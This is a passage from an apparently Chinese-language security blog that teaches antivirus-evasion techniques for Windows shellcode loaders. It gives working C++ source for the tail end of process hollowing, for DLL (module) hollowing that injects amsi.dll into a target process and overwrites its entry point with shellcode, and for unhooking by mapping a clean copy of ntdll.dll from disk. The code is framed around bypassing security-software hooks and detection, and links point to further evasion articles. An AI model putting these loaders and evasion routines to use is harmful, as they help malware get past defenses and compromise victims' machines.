class="hljs-built_in">pi</span>.hProcess, (PVOID)((LPBYTE)RemoteProcessMemory + pSectionHeaders-&gt;VirtualAddress), (PVOID)((LPBYTE)FileImage + pSectionHeaders-&gt;PointerToRawData), pSectionHeaders-&gt;SizeOfRawData, <span class="hljs-built_in">NULL</span>);<br>	&#125;<br><br>	<span class="hljs-comment">//将rax寄存器设置为注入软件的入口点</span><br><span class="hljs-meta">#<span class="hljs-keyword">ifdef</span> _WIN64</span><br>	ctx.Rcx = (SIZE_T)((LPBYTE)RemoteProcessMemory + pNtHeaders-&gt;OptionalHeader.AddressOfEntryPoint);<br>	<span class="hljs-built_in">WriteProcessMemory</span>(<span class="hljs-built_in">pi</span>.hProcess, (PVOID)(ctx.Rdx + (<span class="hljs-built_in">sizeof</span>(SIZE_T) * <span class="hljs-number">2</span>)), &amp;pNtHeaders-&gt;OptionalHeader.ImageBase, <span class="hljs-built_in">sizeof</span>(PVOID), <span class="hljs-built_in">NULL</span>);<br><span class="hljs-meta">#<span class="hljs-keyword">endif</span></span><br><br>	<span class="hljs-comment">//将eax寄存器设置为注入软件的入口点</span><br><span class="hljs-meta">#<span class="hljs-keyword">ifdef</span> _X86_</span><br>	ctx.Eax = (SIZE_T)((LPBYTE)RemoteProcessMemory + pNtHeaders-&gt;OptionalHeader.AddressOfEntryPoint);<br>	<span class="hljs-built_in">WriteProcessMemory</span>(<span class="hljs-built_in">pi</span>.hProcess, (PVOID)(ctx.Ebx + (<span class="hljs-built_in">sizeof</span>(SIZE_T) * <span class="hljs-number">2</span>)), &amp;pNtHeaders-&gt;OptionalHeader.ImageBase, <span class="hljs-built_in">sizeof</span>(PVOID), <span class="hljs-built_in">NULL</span>);<br><span class="hljs-meta">#<span class="hljs-keyword">endif</span></span><br><br><br>	<span class="hljs-built_in">SetThreadContext</span>(<span class="hljs-built_in">pi</span>.hThread, &amp;ctx); <span class="hljs-comment">// 设置线程上下文</span><br>	<span class="hljs-built_in">ResumeThread</span>(<span class="hljs-built_in">pi</span>.hThread); <span class="hljs-comment">// 恢复挂起线程</span><br><br>	<span class="hljs-built_in">CloseHandle</span>(<span class="hljs-built_in">pi</span>.hThread);<br>	<span class="hljs-built_in">CloseHandle</span>(<span class="hljs-built_in">pi</span>.hProcess);<br>	<span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>



<p><img src="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051706822.png" srcset="/img/loading.gif" lazyload alt="image-20251005170626774"></p>
<p>我们根据cs上面的线程PID 13128 在Process Hacker中看到，没有父子进程。这也能看出来这和傀儡进程的区别了。傀儡进程是创建一个进程再放入shellcode代码，而进程镂空是将已经运行的进程进行空心化处理，再放入程序</p>
<p><img src="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051718089.png" srcset="/img/loading.gif" lazyload alt="image-20251005171839008"></p>
<h1 id="模块镂空"><a href="#模块镂空" class="headerlink" title="模块镂空"></a>模块镂空</h1><h2 id="简单介绍-2"><a href="#简单介绍-2" class="headerlink" title="简单介绍"></a>简单介绍</h2><p>模块镂空(dll hollowing)也是一种shellcode注入技术，原理和思路与process hollowing类似，通过合法的模块信息来伪装恶意代码，虽然我们可以用远程dll注入来完整注入整个恶意dll，但此类注入往往比较容易检测，我们需要往受害者主机上传入一个恶意dll，这样杀毒软件可以通过监控入windows&#x2F;temp&#x2F;等目录实现对远程dll注入的拦截，而模块镂空就不会存在这样的风险，因为我们镂空的往往是一个带有微软签名的dll，为了防止进程出错，我们并不能直接镂空一个进程空间中已存在的dll，需要先对目标进程远程注入一个系统合法dll，然后再镂空它，这样我们就获得了一个和windows模块相关联的shellcode环境</p>
<h2 id="代码实现-2"><a href="#代码实现-2" class="headerlink" title="代码实现"></a>代码实现</h2><figure class="highlight objectivec"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><code class="hljs objectivec"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;iostream&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;Windows.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;psapi.h&gt;</span></span><br><br><span class="hljs-type">int</span> main(<span class="hljs-type">int</span> argc, <span class="hljs-type">char</span>* argv[])<br>&#123;<br>	HANDLE processHandle;<br>	PVOID remoteBuffer;<br>	<span class="hljs-type">wchar_t</span> moduleToInject[] = L<span class="hljs-string">&quot;C:\\windows\\system32\\amsi.dll&quot;</span>;<br>	HMODULE modules[<span class="hljs-number">256</span>] = &#123;&#125;;<br>	SIZE_T modulesSize = <span class="hljs-keyword">sizeof</span>(modules);<br>	DWORD modulesSizeNeeded = <span class="hljs-number">0</span>;<br>	DWORD moduleNameSize = <span class="hljs-number">0</span>;<br>	SIZE_T modulesCount = <span class="hljs-number">0</span>;<br>	CHAR remoteModuleName[<span class="hljs-number">128</span>] = &#123;&#125;;<br>	HMODULE remoteModule = <span class="hljs-literal">NULL</span>;<br><br>	<span class="hljs-comment">// 64位shellcode</span><br>	<span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> shellcode[] = <span class="hljs-string">&quot;&quot;</span>;<br><br>	<span class="hljs-comment">// 创建远线程注入正常的DLL</span><br>	<span class="hljs-comment">//processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));</span><br>	processHandle = OpenProcess(PROCESS_ALL_ACCESS, <span class="hljs-literal">FALSE</span>, <span class="hljs-number">3488</span>);<br><br>	remoteBuffer = VirtualAllocEx(processHandle, <span class="hljs-literal">NULL</span>, <span class="hljs-keyword">sizeof</span> moduleToInject, MEM_COMMIT, PAGE_READWRITE);<br>	WriteProcessMemory(processHandle, remoteBuffer, (LPVOID)moduleToInject, <span class="hljs-keyword">sizeof</span> moduleToInject, <span class="hljs-literal">NULL</span>);<br>	PTHREAD_START_ROUTINE threadRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT(<span class="hljs-string">&quot;Kernel32&quot;</span>)), <span class="hljs-string">&quot;LoadLibraryW&quot;</span>);<br>	HANDLE dllThread = CreateRemoteThread(processHandle, <span class="hljs-literal">NULL</span>, <span class="hljs-number">0</span>, threadRoutine, remoteBuffer, <span class="hljs-number">0</span>, <span class="hljs-literal">NULL</span>);<br>	WaitForSingleObject(dllThread, <span class="hljs-number">1000</span>);<br><br>	<span class="hljs-comment">// 找到注入的DLL模块基址</span><br>	EnumProcessModules(processHandle, modules, modulesSize, &amp;modulesSizeNeeded);<br>	modulesCount = modulesSizeNeeded / <span class="hljs-keyword">sizeof</span>(HMODULE);<br>	<span class="hljs-keyword">for</span> (size_t i = <span class="hljs-number">0</span>; i &lt; modulesCount; i++)<br>	&#123;<br>		remoteModule = modules[i];<br>		GetModuleBaseNameA(processHandle, remoteModule, remoteModuleName, <span class="hljs-keyword">sizeof</span>(remoteModuleName));<br>		<span class="hljs-keyword">if</span> (std::string(remoteModuleName).compare(<span class="hljs-string">&quot;amsi.dll&quot;</span>) == <span class="hljs-number">0</span>)<br>		&#123;<br>			std::cout &lt;&lt; remoteModuleName &lt;&lt; <span class="hljs-string">&quot; at &quot;</span> &lt;&lt; modules[i];<br>			<span class="hljs-keyword">break</span>;<br>		&#125;<br>	&#125;<br><br>	<span class="hljs-comment">//得到DLL入口点</span><br>	DWORD headerBufferSize = <span class="hljs-number">0x1000</span>;<br>	LPVOID targetProcessHeaderBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, headerBufferSize);<br>	ReadProcessMemory(processHandle, remoteModule, targetProcessHeaderBuffer, headerBufferSize, <span class="hljs-literal">NULL</span>);<br><br>	PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)targetProcessHeaderBuffer;<br>	PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)targetProcessHeaderBuffer + dosHeader-&gt;e_lfanew);<br>	LPVOID dllEntryPoint = (LPVOID)(ntHeader-&gt;OptionalHeader.AddressOfEntryPoint + (DWORD_PTR)remoteModule);<br>	std::cout &lt;&lt; <span class="hljs-string">&quot;, entryPoint at &quot;</span> &lt;&lt; dllEntryPoint;<br><br>	<span class="hljs-comment">// 覆盖DLL代码</span><br>	WriteProcessMemory(processHandle, dllEntryPoint, (LPCVOID)shellcode, <span class="hljs-keyword">sizeof</span>(shellcode), <span class="hljs-literal">NULL</span>);<br><br>	<span class="hljs-comment">// 远线程执行</span><br>	CreateRemoteThread(processHandle, <span class="hljs-literal">NULL</span>, <span class="hljs-number">0</span>, (PTHREAD_START_ROUTINE)dllEntryPoint, <span class="hljs-literal">NULL</span>, <span class="hljs-number">0</span>, <span class="hljs-literal">NULL</span>);<br><br>	<span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051739514.png" srcset="/img/loading.gif" lazyload alt="image-20251005173957459"></p>
<p>优点:</p>
<ol>
<li>不需要分配 RWX 内存页面或更改其在目标进程中的权限</li>
<li>Shellcode 被注入到合法的 Windows DLL 中，因此寻找从 c:\temp\ 等奇怪位置加载的 DLL 的检测将不起作用</li>
<li>执行 shellcode 的远程线程与合法的 Windows 模块相关联</li>
</ol>
<h1 id="重载dll进行脱钩"><a href="#重载dll进行脱钩" class="headerlink" title="重载dll进行脱钩"></a>重载dll进行脱钩</h1><h2 id="简单介绍-3"><a href="#简单介绍-3" class="headerlink" title="简单介绍"></a>简单介绍</h2><p><a target="_blank" rel="noopener" href="https://idiotc4t.com/defense-evasion/load-ntdll-too">载入第二个Ntdll绕Hook | idiotc4t’s blog</a></p>
<h3 id="核心概念：什么是-Hook？"><a href="#核心概念：什么是-Hook？" class="headerlink" title="核心概念：什么是 Hook？"></a>核心概念：什么是 Hook？</h3><p>在理解脱钩之前，我们得先明白什么是“钩子”（Hook）。想象一下，你有一扇门，门上有一个门铃。正常情况下，你按门铃，门铃就会响。</p>
<ul>
<li><p>**原始函数 (Original Function)**：就是“按门铃”这个动作，它会直接导致“门铃响”。</p>
</li>
<li><p>Hooking (挂钩)</p>
<p>：有人在你按门铃和门铃响之间加了一个“拦截器”。你一按门铃，这个拦截器就先接到信号，它可以选择：</p>
<ol>
<li><strong>自己处理</strong>：比如，它可能直接播放一段录音，而不是让门铃响。</li>
<li><strong>记录一下</strong>：它可能在小本子上记下“有人按门铃了”，然后才让门铃响。</li>
<li><strong>修改一下</strong>：它可能把你的“按门铃”信号变成“敲门”信号，然后去敲门。</li>
<li><strong>阻止</strong>：它可能直接把你的信号吃掉，门铃根本不响。</li>
</ol>
</li>
</ul>
<p>在计算机世界里，这个“门铃”就是操作系统提供的各种函数（API），特别是那些底层的系统调用。当你程序想“打开一个文件”或“分配一块内存”时，它会调用像 <code>NtCreateFile</code> 或 <code>NtAllocateVirtualMemory</code> 这样的系统 API。</p>
<p>Hooking 就是通过修改这些 API 函数在内存中的起始代码，让它们不再直接执行原始逻辑，而是先跳转到我们预设的“拦截器”代码。</p>
<h3 id="ntdll-dll：操作系统的“直通车”"><a href="#ntdll-dll：操作系统的“直通车”" class="headerlink" title="ntdll.dll：操作系统的“直通车”"></a><code>ntdll.dll</code>：操作系统的“直通车”</h3><p><code>ntdll.dll</code> 是 Windows 操作系统中一个非常特殊的动态链接库（DLL）。它不是普通的 DLL，而是用户模式应用程序通往内核模式（操作系统核心）的“直通车”。</p>
<ul>
<li>它包含了大量底层、未经微软官方文档完全公开的 <strong>Native API</strong>（或称 <strong>NT API</strong>）。</li>
<li>这些 API 是许多高级操作的最终执行者，例如文件操作、进程管理、内存分配等。</li>
<li>几乎所有 Win32 API（我们平时用的 <code>CreateFile</code>、<code>VirtualAlloc</code> 等）最终都会通过层层调用，抵达 <code>ntdll.dll</code> 中的某个 Native API。</li>
</ul>
<p>正因为 <code>ntdll.dll</code> 如此核心，它就成了攻击者和安全软件都喜欢 Hook 的目标。恶意软件可能 Hook <code>NtCreateFile</code> 来隐藏它创建的文件，安全软件可能 Hook <code>NtWriteVirtualMemory</code> 来阻止恶意代码写入关键内存区域。</p>
<h3 id="脱钩（Unhooking）：恢复“门铃”的正常功能"><a href="#脱钩（Unhooking）：恢复“门铃”的正常功能" class="headerlink" title="脱钩（Unhooking）：恢复“门铃”的正常功能"></a>脱钩（Unhooking）：恢复“门铃”的正常功能</h3><p>脱钩的目的很简单：<strong>移除 Hook，让被修改的 API 函数恢复到它原始的、未被篡改的状态。</strong> 就像把门铃上的拦截器拆掉，让按门铃直接导致门铃响。</p>
<h3 id="“重载-ntdll-dll-脱钩”-的原理：以假乱真，以新换旧"><a href="#“重载-ntdll-dll-脱钩”-的原理：以假乱真，以新换旧" class="headerlink" title="“重载 ntdll.dll 脱钩” 的原理：以假乱真，以新换旧"></a>“重载 <code>ntdll.dll</code> 脱钩” 的原理：以假乱真，以新换旧</h3><p>这个手法的核心思想是：<strong>当前进程内存中加载的 <code>ntdll.dll</code> 可能已经被 Hook 了，那么我们去磁盘上找一份原始的、干净的 <code>ntdll.dll</code> 文件，把它重新加载到内存的另一个地方，然后用这份干净副本中的函数代码，去覆盖当前进程中被 Hook 的函数代码。</strong></p>
<p>我们来一步步拆解：</p>
<ol>
<li><p><strong>发现异常：</strong></p>
<ul>
<li>我们的程序运行着，但发现某些系统调用行为异常，或者安全软件检测到有 Hook 存在。</li>
<li>或者，我们主动去检查 <code>ntdll.dll</code> 中关键函数的起始字节，发现它们被修改了（比如，不再是正常的函数开头指令，而是一个 <code>JMP</code> 跳转指令）。</li>
</ul>
</li>
<li><p><strong>寻找“真理”：获取原始 <code>ntdll.dll</code> 副本：</strong></p>
<ul>
<li><p>这是最关键的一步。我们不能相信当前进程内存中已有的 <code>ntdll.dll</code>，因为它可能已经被污染了。</p>
</li>
<li><p>最常用的方法：从磁盘重新加载。</p>
<ul>
<li><p>我们知道 <code>ntdll.dll</code> 的原始文件在 <code>C:\Windows\System32\ntdll.dll</code>。</p>
</li>
<li><p>我们使用</p>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs lsl">LoadLibraryEx(<span class="hljs-string">&quot;C:<span class="hljs-subst">\\</span>Windows<span class="hljs-subst">\\</span>System32<span class="hljs-subst">\\</span>ntdll.dll&quot;</span>, NULL, DONT_RESOLVE_DLL_REFERENCES);<br></code></pre></td></tr></table></figure>

<p>这个函数。</p>
<ul>
<li><code>LoadLibraryEx</code> 会将这个文件加载到当前进程的另一个独立的内存区域。</li>
<li><strong><code>DONT_RESOLVE_DLL_REFERENCES</code> 标志至关重要！</strong> 它告诉操作系统，仅仅把这个 DLL 的原始字节加载进来，不要去解析它的导入表（也就是它依赖的其他 DLL），也不要调用它的 <code>DllMain</code> 函数进行初始化。这样，我们得到的就是一份纯粹的、未被执行过任何代码、也未被 Hook 污染的 <code>ntdll.dll</code> 原始副本。</li>
</ul>
</li>
<li><p>现在，我们进程里有了两份 <code>ntdll.dll</code>：一份是可能被 Hook 的（旧的），一份是干净的（新的）。</p>
</li>
</ul>
</li>
</ul>
</li>
<li><p><strong>“狸猫换太子”：恢复函数代码：</strong></p>
<ul>
<li>现在我们有了“旧的”被 Hook 的 <code>ntdll.dll</code>（在进程的某个基地址），以及“新的”干净的 <code>ntdll.dll</code>（在另一个基地址）。</li>
<li>定位函数：<ul>
<li>对于我们想要脱钩的函数（例如 <code>NtCreateFile</code>），我们首先在“旧的” <code>ntdll.dll</code> 中找到它的内存地址。</li>
<li>然后，我们在“新的” <code>ntdll.dll</code> 副本中找到 <code>NtCreateFile</code> 对应的原始代码的内存地址。由于 ASLR (地址空间布局随机化)，这两个 <code>ntdll.dll</code> 的基地址可能不同，但函数相对于其所在 DLL 基地址的 <strong>偏移量</strong> 是相同的。所以，我们可以通过计算偏移量来找到对应的函数。</li>
</ul>
</li>
<li>修改内存权限：<ul>
<li>被 Hook 的函数代码通常位于可执行内存区域，默认是只读的。我们需要使用 <code>VirtualProtect</code> 函数，暂时将这块内存区域的权限修改为可写 (<code>PAGE_EXECUTE_READWRITE</code>)。</li>
</ul>
</li>
<li>字节覆盖：<ul>
<li>将“新的” <code>ntdll.dll</code> 副本中 <code>NtCreateFile</code> 函数的原始字节（通常是 Hooking 篡改的开头几个字节，或者整个函数体，取决于 Hook 的复杂程度）复制到“旧的” <code>ntdll.dll</code> 中 <code>NtCreateFile</code> 函数的地址上。</li>
</ul>
</li>
<li>恢复内存权限：<ul>
<li>使用 <code>VirtualProtect</code> 将内存权限恢复到原始状态（通常是 <code>PAGE_EXECUTE_READ</code>）。</li>
</ul>
</li>
<li>刷新指令缓存：<ul>
<li>调用 <code>FlushInstructionCache</code> 函数。这是非常重要的一步，它告诉 CPU 丢弃缓存中旧的指令，重新从内存中加载最新的指令。这样，CPU 才能执行我们刚刚恢复的原始代码。</li>
</ul>
</li>
</ul>
</li>
</ol>
<h3 id="总结："><a href="#总结：" class="headerlink" title="总结："></a>总结：</h3><p>“重载 <code>ntdll.dll</code> 脱钩”就是利用 Windows 允许进程加载多个相同 DLL 文件的特性，通过加载一份原始的 <code>ntdll.dll</code> 副本，然后用这份副本中的干净代码去覆盖当前进程中被 Hook 的 <code>ntdll.dll</code> 中的函数代码，从而恢复系统 API 的正常功能。</p>
<h3 id="优缺点："><a href="#优缺点：" class="headerlink" title="优缺点："></a>优缺点：</h3><p><strong>优点：</strong></p>
<ul>
<li><strong>有效对抗用户模式 Hook：</strong> 对于大多数在用户模式下对 <code>ntdll.dll</code> 进行的 Hooking（例如通过修改函数开头指令），这种方法非常有效。</li>
<li><strong>相对通用：</strong> 不依赖于特定的 Hooking 技术，只要能获取到原始代码，就能恢复。</li>
</ul>
<p><strong>缺点：</strong></p>
<ul>
<li><p><strong>无法对抗内核模式 Hook：</strong> 这种方法只在用户模式下操作进程内存。如果 Hook 发生在内核模式（例如通过修改 SSDT 或内核驱动），用户模式的脱钩是无能为力的。</p>
</li>
<li><p><strong>时机敏感：</strong> 如果在脱钩代码执行之前，脱钩代码本身所依赖的 <code>ntdll.dll</code> 函数已经被 Hook，那么脱钩操作可能无法正确执行。</p>
</li>
<li><p><strong>内存开销：</strong> 重新加载 <code>ntdll.dll</code> 会在进程中额外占用一份 <code>ntdll.dll</code> 的内存空间。</p>
</li>
<li><p><strong>复杂 Hooking：</strong> 对于那些不只是修改函数开头，而是修改函数内部逻辑或数据结构的复杂 Hook，简单的字节覆盖可能不够。</p>
</li>
</ul>
<h2 id="代码实现-3"><a href="#代码实现-3" class="headerlink" title="代码实现"></a>代码实现</h2><figure class="highlight objectivec"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br></pre></td><td class="code"><pre><code class="hljs objectivec"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;Windows.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> DEREF( name )*(UINT_PTR *)(name)</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> DEREF_64( name )*(DWORD64 *)(name)</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> DEREF_32( name )*(DWORD *)(name)</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> DEREF_16( name )*(WORD *)(name)</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> DEREF_8( name )*(BYTE *)(name)</span><br><br><span class="hljs-keyword">typedef</span> NTSTATUS(NTAPI* pNtAllocateVirtualMemory)(<br>	HANDLE ProcessHandle,<br>	PVOID* BaseAddress,<br>	ULONG_PTR ZeroBits,<br>	PSIZE_T RegionSize,<br>	ULONG AllocationType,<br>	ULONG Protect);<br><br>FARPROC WINAPI GetProcAddressR(HANDLE hModule, LPCSTR lpProcName)<br>&#123;<br>	<span class="hljs-built_in">UINT_PTR</span> uiLibraryAddress = <span class="hljs-number">0</span>;<br>	FARPROC fpResult = <span class="hljs-literal">NULL</span>;<br><br>	<span class="hljs-keyword">if</span> (hModule == <span class="hljs-literal">NULL</span>)<br>		<span class="hljs-keyword">return</span> <span class="hljs-literal">NULL</span>;<br>	uiLibraryAddress = (<span class="hljs-built_in">UINT_PTR</span>)hModule;<br><br>	__try<br>	&#123;<br>		<span class="hljs-built_in">UINT_PTR</span> uiAddressArray = <span class="hljs-number">0</span>;<br>		<span class="hljs-built_in">UINT_PTR</span> uiNameArray = <span class="hljs-number">0</span>;<br>		<span class="hljs-built_in">UINT_PTR</span> uiNameOrdinals = <span class="hljs-number">0</span>;<br>		PIMAGE_NT_HEADERS pNtHeaders = <span class="hljs-literal">NULL</span>;<br>		PIMAGE_DATA_DIRECTORY pDataDirectory = <span class="hljs-literal">NULL</span>;<br>		PIMAGE_EXPORT_DIRECTORY pExportDirectory = <span class="hljs-literal">NULL</span>;<br>		pNtHeaders = (PIMAGE_NT_HEADERS)(uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)-&gt;e_lfanew);<br>		pDataDirectory = (PIMAGE_DATA_DIRECTORY)&amp;pNtHeaders-&gt;OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];<br>		pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(uiLibraryAddress + pDataDirectory-&gt;VirtualAddress);<br>		uiAddressArray = (uiLibraryAddress + pExportDirectory-&gt;AddressOfFunctions);<br>		uiNameArray = (uiLibraryAddress + pExportDirectory-&gt;AddressOfNames);<br>		uiNameOrdinals = (uiLibraryAddress + pExportDirectory-&gt;AddressOfNameOrdinals);<br>		<span class="hljs-keyword">if</span> (((DWORD)lpProcName &amp; <span class="hljs-number">0xFFFF0000</span>) == <span class="hljs-number">0x00000000</span>)<br>		&#123;<br>			uiAddressArray += ((IMAGE_ORDINAL((DWORD)lpProcName) - pExportDirectory-&gt;Base) * <span class="hljs-keyword">sizeof</span>(DWORD));<br>			fpResult = (FARPROC)(uiLibraryAddress + DEREF_32(uiAddressArray));<br>		&#125;<br>		<span class="hljs-keyword">else</span><br>		&#123;<br>			DWORD dwCounter = pExportDirectory-&gt;NumberOfNames;<br>			<span class="hljs-keyword">while</span> (dwCounter--)<br>			&#123;<br>				<span class="hljs-type">char</span>* cpExportedFunctionName = (<span class="hljs-type">char</span>*)(uiLibraryAddress + DEREF_32(uiNameArray));<br>				<span class="hljs-keyword">if</span> (strcmp(cpExportedFunctionName, lpProcName) == <span class="hljs-number">0</span>)<br>				&#123;<br>					uiAddressArray += (DEREF_16(uiNameOrdinals) * <span class="hljs-keyword">sizeof</span>(DWORD));<br>					fpResult = (FARPROC)(uiLibraryAddress + DEREF_32(uiAddressArray));<br><br>					<span class="hljs-keyword">break</span>;<br>				&#125;<br>				uiNameArray += <span class="hljs-keyword">sizeof</span>(DWORD);<br>				uiNameOrdinals += <span class="hljs-keyword">sizeof</span>(WORD);<br>			&#125;<br>		&#125;<br>	&#125;<br>	__except (EXCEPTION_EXECUTE_HANDLER)<br>	&#123;<br>		fpResult = <span class="hljs-literal">NULL</span>;<br>	&#125;<br><br>	<span class="hljs-keyword">return</span> fpResult;<br>&#125;<br><br><br><span class="hljs-type">int</span> main() &#123;<br><br>	HANDLE hNtdllfile = CreateFileA(<span class="hljs-string">&quot;c:\\windows\\system32\\ntdll.dll&quot;</span>, GENERIC_READ, FILE_SHARE_READ, <span class="hljs-literal">NULL</span>, OPEN_EXISTING, <span class="hljs-number">0</span>, <span class="hljs-literal">NULL</span>);<br>	HANDLE hNtdllMapping = CreateFileMapping(hNtdllfile, <span class="hljs-literal">NULL</span>, PAGE_READONLY | SEC_IMAGE, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-literal">NULL</span>);<br>	LPVOID lpNtdllmaping = MapViewOfFile(hNtdllMapping, FILE_MAP_READ, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>);<br><br>	pNtAllocateVirtualMemory NtAllocateVirtualMemory = (pNtAllocateVirtualMemory)GetProcAddressR((HMODULE)lpNtdllmaping, <span class="hljs-string">&quot;NtAllocateVirtualMemory&quot;</span>);<br><br>	<span class="hljs-type">int</span> err = GetLastError();<br><br>	LPVOID Address = <span class="hljs-literal">NULL</span>;<br>	SIZE_T uSize = <span class="hljs-number">0x1000</span>;<br><br>	NTSTATUS status = NtAllocateVirtualMemory(GetCurrentProcess(), &amp;Address, <span class="hljs-number">0</span>, &amp;uSize, MEM_COMMIT, PAGE_READWRITE);<br><br><br><br>	<span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;;<br></code></pre></td></tr></table></figure>



<h1 id="ring3层重写api-绕过hook"><a href="#ring3层重写api-绕过hook" class="headerlink" title="ring3层重写api 绕过hook"></a>ring3层重写api 绕过hook</h1><h2 id="简单介绍-4"><a href="#简单介绍-4" class="headerlink" title="简单介绍"></a>简单介绍</h2><p>这个手法和重载ntdll一样的都是为了绕过杀软的hook，具体介绍可以看这个大佬的文章</p>
<p>重写ring3 API函数<br>作者：一天<br><a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/17323">https://xz.aliyun.com/news/17323</a><br>文章转载自 先知社区</p>
<h1 id="动态获取API（隐藏IAT导入表）"><a href="#动态获取API（隐藏IAT导入表）" class="headerlink" title="动态获取API（隐藏IAT导入表）"></a>动态获取API（隐藏IAT导入表）</h1><h2 id="简单介绍-5"><a href="#简单介绍-5" class="headerlink" title="简单介绍"></a>简单介绍</h2><p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/17170">动态获取API函数（又称隐藏IAT）实现免杀<br>作者：一天<br>https://xz.aliyun.com/news/17170<br>文章转载自 先知社区</a></p>
<p>还是这个我最喜欢的博主，先知社区的大佬。</p>
